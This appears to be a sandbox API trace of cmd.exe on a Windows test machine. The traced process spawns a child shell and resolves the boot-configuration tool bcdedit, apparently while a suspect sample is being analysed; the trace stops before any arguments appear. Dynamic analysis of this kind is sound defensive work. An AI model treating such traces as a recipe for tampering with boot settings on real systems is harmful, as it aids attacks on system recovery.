[0046.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f9cc0 [0046.243] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.243] GetProcessHeap () returned 0x2e0000 [0046.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x28) returned 0x2f4740 [0046.243] GetProcessHeap () returned 0x2e0000 [0046.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2f9d80 [0046.243] GetProcessHeap () returned 0x2e0000 [0046.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x7c) returned 0x2f9fa0 [0046.243] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2e1320 [0046.244] SetErrorMode (uMode=0x0) returned 0x0 [0046.244] SetErrorMode (uMode=0x1) returned 0x0 [0046.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x2e1330, lpFilePart=0x22f0e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f0e0*="system32") returned 0x13 [0046.244] SetErrorMode (uMode=0x0) returned 0x1 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1320, Size=0x48) returned 0x2e1320 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1320) returned 0x48 [0046.244] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x3e) returned 0x300e90 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x68) returned 0x2fa030 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fa030, Size=0x3e) returned 0x2fa030 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fa030) returned 0x3e [0046.244] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.244] GetProcessHeap () returned 0x2e0000 [0046.244] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x301e60 [0046.247] GetProcessHeap () returned 0x2e0000 [0046.247] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x301e60, Size=0x7e) returned 0x301e60 [0046.247] GetProcessHeap () returned 0x2e0000 [0046.248] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x301e60) returned 0x7e [0046.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x22ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee50) returned 0x301ef0 [0046.249] GetProcessHeap () returned 0x2e0000 [0046.249] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x28) returned 0x2f4770 [0046.249] FindClose (in: hFindFile=0x301ef0 | out: hFindFile=0x301ef0) returned 1 [0046.249] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0046.249] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0046.249] GetConsoleTitleW (in: lpConsoleTitle=0x22f3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.250] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f118 | out: lpAttributeList=0x22f158, lpSize=0x22f118) returned 1 [0046.250] UpdateProcThreadAttribute (in: lpAttributeList=0x22f158, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f108, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f158, lpPreviousValue=0x0) returned 1 [0046.250] GetStartupInfoW (in: lpStartupInfo=0x22f270 | out: lpStartupInfo=0x22f270*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.250] GetProcessHeap () returned 0x2e0000 [0046.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2e13b0 [0046.250] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.250] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.250] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.250] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.251] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.251] GetProcessHeap () returned 0x2e0000 [0046.251] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e13b0 | out: hHeap=0x2e0000) returned 1 [0046.251] GetProcessHeap () returned 0x2e0000 [0046.251] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2fa080 [0046.252] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.253] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x22f190*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f140 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6037086\"", lpProcessInformation=0x22f140*(hProcess=0x60, hThread=0x58, dwProcessId=0x4f4, dwThreadId=0x65c)) returned 1 [0046.266] CloseHandle (hObject=0x58) returned 1 [0046.266] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.266] GetProcessHeap () returned 0x2e0000 [0046.266] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fc350 | out: hHeap=0x2e0000) returned 1 [0046.266] GetEnvironmentStringsW () returned 0x2faed0* [0046.266] GetProcessHeap () returned 0x2e0000 [0046.266] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xae8) returned 0x2fb9c0 [0046.266] FreeEnvironmentStringsW (penv=0x2faed0) returned 1 [0046.266] GetProcessHeap () returned 0x2e0000 [0046.266] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fa080 | out: hHeap=0x2e0000) returned 1 [0046.266] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f158 | out: lpAttributeList=0x22f158) [0046.267] _get_osfhandle (_FileHandle=3) returned 0x54 [0046.267] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0046.267] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0046.268] _close (_FileHandle=5) returned 0 [0046.268] _dup (_FileHandle=0) returned 4 [0046.269] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0046.269] _close (_FileHandle=3) returned 0 [0046.270] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.270] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.270] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.270] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.270] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.270] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.270] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.270] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.270] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.270] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.270] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.270] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.270] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.270] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.270] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.270] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.270] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.270] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.270] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.270] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.270] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.270] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.270] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.270] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.270] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.270] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.270] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.270] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.270] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.270] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.270] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.270] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.270] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.270] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.270] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.271] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.271] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.271] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.271] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.271] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.271] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.271] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.271] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.271] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.271] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.271] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.271] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.271] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.271] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.271] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.271] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.271] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.271] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.271] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.271] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.271] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.271] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.271] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.271] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.271] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.271] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.271] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.271] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.271] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.271] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.271] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.271] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.271] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.272] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.272] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.272] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.272] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.272] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.272] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.272] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.272] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.272] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.272] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.272] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0046.272] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0046.272] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0046.272] GetProcessHeap () returned 0x2e0000 [0046.272] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4010) returned 0x301ef0 [0046.272] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.272] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.272] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.272] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.272] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.272] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.272] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.273] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.273] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.273] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.273] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.273] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.273] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.273] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.273] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.273] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.273] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.273] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.273] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.273] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.273] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.273] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.273] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.273] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.273] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.273] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.273] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.273] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.273] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.273] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.273] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.273] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.273] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.273] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.273] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.273] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.273] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.273] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.273] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.273] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.273] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.273] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.273] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0046.274] GetProcessHeap () returned 0x2e0000 [0046.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2fc4b0 [0046.274] SetErrorMode (uMode=0x0) returned 0x0 [0046.274] SetErrorMode (uMode=0x1) returned 0x0 [0046.274] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fc4c0, lpFilePart=0x22f350 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f350*="Desktop") returned 0x25 [0046.274] SetErrorMode (uMode=0x0) returned 0x1 [0046.274] GetProcessHeap () returned 0x2e0000 [0046.274] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fc4b0, Size=0x6c) returned 0x2fc4b0 [0046.274] GetProcessHeap () returned 0x2e0000 [0046.274] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fc4b0) returned 0x6c [0046.274] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.274] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.274] GetProcessHeap () returned 0x2e0000 [0046.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x128) returned 0x2f5c90 [0046.274] GetProcessHeap () returned 0x2e0000 [0046.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x240) returned 0x2fc530 [0046.276] GetProcessHeap () returned 0x2e0000 [0046.276] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fc530, Size=0x12a) returned 0x2fc530 [0046.276] GetProcessHeap () returned 0x2e0000 [0046.276] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fc530) returned 0x12a [0046.276] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.276] GetProcessHeap () returned 0x2e0000 [0046.276] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2e1cf0 [0046.276] GetProcessHeap () returned 0x2e0000 [0046.276] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1cf0, Size=0x7e) returned 0x2e1cf0 [0046.276] GetProcessHeap () returned 0x2e0000 [0046.276] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1cf0) returned 0x7e [0046.276] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.276] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0c0) returned 0xffffffffffffffff [0046.277] GetLastError () returned 0x2 [0046.277] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0c0) returned 0xffffffffffffffff [0046.277] GetLastError () returned 0x2 [0046.277] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0c0) returned 0x2e1d80 [0046.277] GetProcessHeap () returned 0x2e0000 [0046.277] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f4770, Size=0x8) returned 0x2e1de0 [0046.277] FindClose (in: hFindFile=0x2e1d80 | out: hFindFile=0x2e1d80) returned 1 [0046.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x22f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0c0) returned 0xffffffffffffffff [0046.277] GetLastError () returned 0x2 [0046.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0c0) returned 0x2e1d80 [0046.277] FindClose (in: hFindFile=0x2e1d80 | out: hFindFile=0x2e1d80) returned 1 [0046.277] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.278] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x28) returned 0x2f4770 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2fc670 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x86) returned 0x2fc890 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2fc920 [0046.278] SetErrorMode (uMode=0x0) returned 0x0 [0046.278] SetErrorMode (uMode=0x1) returned 0x0 [0046.278] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fc930, lpFilePart=0x22f0e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f0e0*="Desktop") returned 0x25 [0046.278] SetErrorMode (uMode=0x0) returned 0x1 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fc920, Size=0x6c) returned 0x2fc920 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fc920) returned 0x6c [0046.278] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.278] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x128) returned 0x2fc9a0 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x240) returned 0x2fcad0 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fcad0, Size=0x12a) returned 0x2fcad0 [0046.278] GetProcessHeap () returned 0x2e0000 [0046.278] 